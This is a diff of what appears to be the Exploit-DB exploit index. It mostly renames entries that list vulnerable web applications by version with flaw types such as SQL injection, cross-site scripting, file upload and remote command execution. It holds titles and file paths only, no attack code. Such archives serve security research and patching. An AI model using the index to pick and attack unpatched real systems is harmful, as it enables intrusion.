1.0 - 'id' Parameter SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0 +36227,platforms/php/webapps/36227.txt,"Joomla! Component com_sgicatalog 1.0 - 'id' SQL Injection",2011-10-12,"BHG Security Center",php,webapps,0 36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0 36230,platforms/php/webapps/36230.txt,"WordPress Plugin Calculated Fields Form 1.0.10 - SQL Injection",2015-03-02,"Ibrahim Raafat",php,webapps,0 36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Arbitrary File Upload",2015-02-28,R-73eN,php,webapps,0 36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection",2015-03-02,Net.Edit0r,php,webapps,80 36233,platforms/php/webapps/36233.txt,"WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0 -36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Parameter Multiple SQL Injections",2011-10-14,m3rciL3Ss,php,webapps,0 +36236,platforms/php/webapps/36236.txt,"Xenon - 'id' Multiple SQL Injections",2011-10-14,m3rciL3Ss,php,webapps,0 36237,platforms/php/webapps/36237.txt,"asgbookPHP 1.9 - 'index.php' Cross-Site Scripting",2011-10-17,indoushka,php,webapps,0 36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 - 'index.php' Cross-Site Scripting / SQL Injection",2011-10-18,"Stefan Schurtz",php,webapps,0 36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - Local File Inclusion",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0 @@ -35372,73 +35373,73 @@ id,file,description,date,author,platform,type,port 36248,platforms/php/webapps/36248.txt,"osCommerce - Arbitrary File Upload / File Disclosure",2011-10-20,indoushka,php,webapps,0 36249,platforms/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 36251,platforms/php/webapps/36251.txt,"PHPMoAdmin - Unauthorized Remote Code Execution",2015-03-03,@u0x,php,webapps,80 -36252,platforms/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Parameter Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0 +36252,platforms/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0 36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0 -36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0 +36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusions",2011-10-25,"Null H4ck3r",php,webapps,0 36255,platforms/php/webapps/36255.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0 36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0 36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps,0 36272,platforms/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 -36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusion",2011-11-01,indoushka,php,webapps,0 +36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusions",2011-11-01,indoushka,php,webapps,0 36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 - Cross-Site Scripting / Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0 -36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Parameter Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 +36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) - 'str' Cross-Site Scripting",2011-11-01,Isfahan,php,webapps,0 36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0 36282,platforms/php/webapps/36282.txt,"eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections",2011-11-02,"High-Tech Bridge SA",php,webapps,0 -36283,platforms/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Parameter Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 +36283,platforms/php/webapps/36283.txt,"S9Y Serendipity 1.5.5 - 'serendipity[filter][bp.ALT]' Cross-Site Scripting",2011-11-03,"Stefan Schurtz",php,webapps,0 36280,platforms/php/webapps/36280.txt,"Symphony 2.2.3 - symphony/publish/images filter Parameter Cross-Site Scripting",2011-11-01,"Mesut Timur",php,webapps,0 36281,platforms/php/webapps/36281.txt,"Symphony 2.2.3 - symphony/publish/comments filter Parameter SQL Injection",2011-11-01,"Mesut Timur",php,webapps,0 36284,platforms/asp/webapps/36284.txt,"CmyDocument - Multiple Cross-Site Scripting Vulnerabilities",2011-11-03,demonalex,asp,webapps,0 -36286,platforms/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,webapps,0 -36287,platforms/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Parameter Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 -36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Parameter Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 +36286,platforms/hardware/webapps/36286.txt,"DreamBox DM800 - 'file' Local File Disclosure",2011-11-04,"Todor Donev",hardware,webapps,0 +36287,platforms/php/webapps/36287.txt,"WordPress Theme Bonus 1.0 - 's' Cross-Site Scripting",2011-11-04,3spi0n,php,webapps,0 +36289,platforms/php/webapps/36289.txt,"SmartJobBoard - 'keywords' Cross-Site Scripting",2011-11-07,Mr.PaPaRoSSe,php,webapps,0 36290,platforms/php/webapps/36290.txt,"Admin Bot - 'news.php' SQL Injection",2011-11-07,baltazar,php,webapps,0 -36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal",2011-11-07,Buherátor,java,webapps,0 -36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 - 'command_name' Parameter Remote Command Execution",2011-11-04,"Christophe de la Fuente",php,webapps,0 +36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Directory Traversal",2011-11-07,Buherátor,java,webapps,0 +36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 - 'command_name' Remote Command Execution",2011-11-04,"Christophe de la Fuente",php,webapps,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology - 'articlenav.php' SQL Injection",2011-11-08,Kalashinkov3,php,webapps,0 36297,platforms/php/webapps/36297.txt,"AShop - Open-redirection / Cross-Site Scripting",2011-11-09,"Infoserve Security Team",php,webapps,0 36298,platforms/php/webapps/36298.txt,"Joomla! Component com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-10,"Jose Carlos de Arriba",php,webapps,0 36299,platforms/java/webapps/36299.txt,"Infoblox NetMRI 6.2.1 - Admin Login Page Multiple Cross-Site Scripting Vulnerabilities",2011-11-11,"Jose Carlos de Arriba",java,webapps,0 36301,platforms/php/webapps/36301.txt,"WordPress Plugin Download Manager 2.7.2 - Privilege Escalation",2014-11-24,"Kacper Szurek",php,webapps,0 -36302,platforms/php/webapps/36302.txt,"Joomla! Component Content - 'year' Parameter SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 +36302,platforms/php/webapps/36302.txt,"Joomla! Component Content - 'year' SQL Injection",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",php,webapps,80 36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass / SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 -36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - admin_index.php site_name Parameter Cross-Site Scripting",2011-11-13,"Gjoko Krstic",php,webapps,0 -36308,platforms/php/webapps/36308.txt,"Webistry 1.6 - 'pid' Parameter SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 -36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 - reportwriter/ReportMaker.php reportid Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 -36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 - reportwriter/FormMaker.php ReportID Parameter SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 - 'admin_index.php?site_name' Cross-Site Scripting",2011-11-13,"Gjoko Krstic",php,webapps,0 +36308,platforms/php/webapps/36308.txt,"Webistry 1.6 - 'pid' SQL Injection",2011-11-16,CoBRa_21,php,webapps,0 +36314,platforms/php/webapps/36314.txt,"webERP 4.3.8 - 'reportwriter/ReportMaker.php?reportid' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 +36315,platforms/php/webapps/36315.txt,"webERP 4.3.8 - 'reportwriter/FormMaker.php?ReportID' SQL Injection",2011-11-17,"High-Tech Bridge SA",php,webapps,0 36316,platforms/php/webapps/36316.txt,"ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 - Cross-Site Scripting",2011-11-17,"James webb",php,webapps,0 -36317,platforms/php/webapps/36317.txt,"WordPress Plugin Flexible Custom Post Type - 'id' Parameter Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 +36317,platforms/php/webapps/36317.txt,"WordPress Plugin Flexible Custom Post Type - 'id' Cross-Site Scripting",2011-11-17,Am!r,php,webapps,0 36320,platforms/php/webapps/36320.txt,"CodoForum 2.5.1 - Arbitrary File Download",2015-03-10,"Kacper Szurek",php,webapps,80 36321,platforms/php/webapps/36321.txt,"GeniXCMS 0.0.1 - Multiple Vulnerabilities",2015-03-10,LiquidWorm,php,webapps,80 -36322,platforms/php/webapps/36322.txt,"Digital Attic Foundation CMS - 'id' Parameter SQL Injection",2011-11-20,tempe_mendoan,php,webapps,0 -36323,platforms/php/webapps/36323.txt,"WordPress Plugin Alert Before Your Post - 'name' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 -36324,platforms/php/webapps/36324.txt,"WordPress Plugin Advanced Text Widget 2.0 - 'page' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 -36325,platforms/php/webapps/36325.txt,"WordPress Plugin Adminimize 1.7.21 - 'page' Parameter Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 -36326,platforms/php/webapps/36326.txt,"WordPress Plugin Lanoba Social 1.0 - 'action' Parameter Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 -36328,platforms/php/webapps/36328.txt,"TA.CMS - (TeachArabia) index.php id Parameter SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 +36322,platforms/php/webapps/36322.txt,"Digital Attic Foundation CMS - 'id' SQL Injection",2011-11-20,tempe_mendoan,php,webapps,0 +36323,platforms/php/webapps/36323.txt,"WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36324,platforms/php/webapps/36324.txt,"WordPress Plugin Advanced Text Widget 2.0 - 'page' Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 +36325,platforms/php/webapps/36325.txt,"WordPress Plugin Adminimize 1.7.21 - 'page' Cross-Site Scripting",2011-11-21,Am!r,php,webapps,0 +36326,platforms/php/webapps/36326.txt,"WordPress Plugin Lanoba Social 1.0 - 'action' Cross-Site Scripting",2011-11-21,Amir,php,webapps,0 +36328,platforms/php/webapps/36328.txt,"TA.CMS - '(TeachArabia) index.php?id' SQL Injection",2011-11-22,CoBRa_21,php,webapps,0 36329,platforms/php/webapps/36329.txt,"TA.CMS - (TeachArabia) lang Parameter Traversal Local File Inclusion",2011-11-22,CoBRa_21,php,webapps,0 -36330,platforms/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple Parameter SQL Injections",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php id' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php rowid' Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 -36338,platforms/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 -36339,platforms/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 -36340,platforms/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Parameter Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 -36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 +36330,platforms/php/webapps/36330.txt,"Dolibarr ERP/CRM 3.1 - Multiple Script URI Cross-Site Scripting Vulnerabilities",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36338,platforms/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36339,platforms/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36340,platforms/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,php,webapps,0 +36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 mondialrelay (kit_mondialrelay) - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps,0 40008,platforms/php/webapps/40008.txt,"Getsimple CMS 3.3.10 - Arbitrary File Upload",2016-06-23,s0nk3y,php,webapps,80 -36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - modules/mondialrelay/googlemap.php Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 -36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition' Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 -36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Parameter Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 +36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 - 'modules/mondialrelay/googlemap.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps,0 +36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php?Expedition' Cross-Site Scripting",2011-11-23,Prestashop,php,webapps,0 +36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,Prestashop,php,webapps,0 36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 - 'displayImage.php' HTTP Response Splitting",2011-11-23,RGouveia,php,webapps,0 36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h - Multiple Cross-Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0 -36347,platforms/php/webapps/36347.txt,"Hastymail2 - 'rs' Parameter Cross-Site Scripting",2011-11-22,HTrovao,php,webapps,0 +36347,platforms/php/webapps/36347.txt,"Hastymail2 - 'rs' Cross-Site Scripting",2011-11-22,HTrovao,php,webapps,0 36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 - SQL Injection",2011-11-23,anonymous,php,webapps,0 36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 - SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 - 'index.php' hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 -36351,platforms/php/webapps/36351.txt,"Balitbang CMS 3.3 - alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 +36351,platforms/php/webapps/36351.txt,"Balitbang CMS 3.3 - 'alumni.php?hal' SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/mibdiscover node Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/configurationpoll.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/ping.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 @@ -35446,11 +35447,11 @@ id,file,description,date,author,platform,type,port 36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager (NMM) i 9.10 - nnm/protected/traceroute.jsp nodename Parameter Cross-Site Scripting",2011-11-24,anonymous,jsp,webapps,0 36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - Cross-Site Request Forgery",2015-03-11,"Luis Santana",php,webapps,0 36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 -36363,platforms/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Parameter Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 -36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 -36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter Cross-Site Scripting",2011-11-28,LiquidWorm,php,webapps,0 -36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 -36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php Filename' Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36363,platforms/php/webapps/36363.txt,"WordPress Plugin Skysa App Bar - 'idnews' Cross-Site Scripting",2011-11-28,Amir,php,webapps,0 +36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 - 'admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps,0 +36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 - 'admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-28,LiquidWorm,php,webapps,0 +36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 - '/admin/admin_blocks.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - '/admin/admin_pages.php?Filename' Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",php,webapps,0 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",xml,webapps,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0 @@ -35458,9 +35459,9 @@ id,file,description,date,author,platform,type,port 36373,platforms/php/webapps/36373.txt,"Joomla! Component com_simplephotogallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 -36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 -36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 +36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - 'lib/controllers/CentralController.php?id' SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36382,platforms/php/webapps/36382.txt,"WordPress Plugin 1-jquery-photo-gallery-Slideshow-flash 1.01 - Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36383,platforms/php/webapps/36383.txt,"WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting",2011-11-30,Am!r,php,webapps,0 36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections",2011-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -35472,13 +35473,13 @@ id,file,description,date,author,platform,type,port 36408,platforms/php/webapps/36408.txt,"WordPress Plugin Pretty Link 1.5.2 - 'pretty-bar.php' Cross-Site Scripting",2011-12-06,Am!r,php,webapps,0 36410,platforms/php/webapps/36410.txt,"Simple Machines Forum (SMF) 1.1.15 - 'fckeditor' Arbitrary File Upload",2011-12-06,HELLBOY,php,webapps,0 36413,platforms/php/webapps/36413.txt,"WordPress Plugin SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",php,webapps,0 -36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 -36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Parameter Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 +36401,platforms/php/webapps/36401.txt,"AtMail 1.04 - 'func' Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0 +36402,platforms/asp/webapps/36402.txt,"Hero 3.69 - 'month' Cross-Site Scripting",2011-12-01,"Gjoko Krstic",asp,webapps,0 36414,platforms/php/webapps/36414.txt,"WordPress Plugin WPML 3.1.9 - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80 -36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Parameter Cross-Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 -36483,platforms/php/webapps/36483.txt,"WordPress Plugin WP Live.php 1.2.1 - 's' Parameter Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 -36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Parameter Cross-Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 -36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Parameter Cross-Site Scripting",2012-01-02,sonyy,php,webapps,0 +36482,platforms/php/webapps/36482.txt,"Siena CMS 1.242 - 'err' Cross-Site Scripting",2012-01-01,Net.Edit0r,php,webapps,0 +36483,platforms/php/webapps/36483.txt,"WordPress Plugin WP Live.php 1.2.1 - 's' Cross-Site Scripting",2012-01-01,"H4ckCity Security Team",php,webapps,0 +36484,platforms/php/webapps/36484.txt,"PHPB2B 4.1 - 'q' Cross-Site Scripting",2011-01-01,"H4ckCity Security Team",php,webapps,0 +36485,platforms/php/webapps/36485.txt,"FuseTalk Forums 3.2 - 'windowed' Cross-Site Scripting",2012-01-02,sonyy,php,webapps,0 36486,platforms/php/webapps/36486.txt,"Tienda Virtual - 'art_detalle.php' SQL Injection",2012-01-03,"Arturo Zamora",php,webapps,0 36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0 36419,platforms/multiple/webapps/36419.txt,"Metasploit Project < 4.11.1 - Initial User Creation Cross-Site Request Forgery (Metasploit)",2015-03-17,"Mohamed Abdelbaset Elnoby",multiple,webapps,3790 @@ -35495,74 +35496,74 @@ id,file,description,date,author,platform,type,port 36445,platforms/php/webapps/36445.txt,"WordPress Plugin The Welcomizer 1.3.9.4 - 'twiz-index.php' Cross-Site Scripting",2011-12-31,Am!r,php,webapps,0 36446,platforms/php/webapps/36446.txt,"Fork CMS 3.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-16,"Avram Marius",php,webapps,0 36447,platforms/php/webapps/36447.txt,"Pulse Pro 1.7.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-12-14,"Avram Marius",php,webapps,0 -36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - 'parent_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36448,platforms/php/webapps/36448.txt,"BrowserCRM 5.100.1 - 'parent_id' SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36449,platforms/php/webapps/36449.txt,"BrowserCRM 5.100.1 - 'contact_id' SQL Injection",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36450,platforms/php/webapps/36450.txt,"BrowserCRM 5.100.1 - URI Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 +36451,platforms/php/webapps/36451.txt,"BrowserCRM 5.100.1 - 'framed' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 40870,platforms/php/webapps/40870.txt,"WordPress Plugin Single Personal Message 1.0.3 - SQL Injection",2016-12-05,"Lenon Leite",php,webapps,0 36453,platforms/php/webapps/36453.txt,"BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 36454,platforms/php/webapps/36454.txt,"BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting",2011-12-14,"High-Tech Bridge SA",php,webapps,0 -36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Parameter Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 +36456,platforms/php/webapps/36456.txt,"Owl Intranet Engine 1.00 - 'userid' Authentication Bypass",2011-12-15,"RedTeam Pentesting GmbH",php,webapps,0 36457,platforms/cgi/webapps/36457.txt,"Websense 7.6 - Triton Report Management Interface Cross-Site Scripting",2011-12-15,"Ben Williams",cgi,webapps,0 36458,platforms/cgi/webapps/36458.txt,"Websense 7.6 Triton - 'ws_irpt.exe' Remote Command Execution",2011-12-15,"Ben Williams",cgi,webapps,0 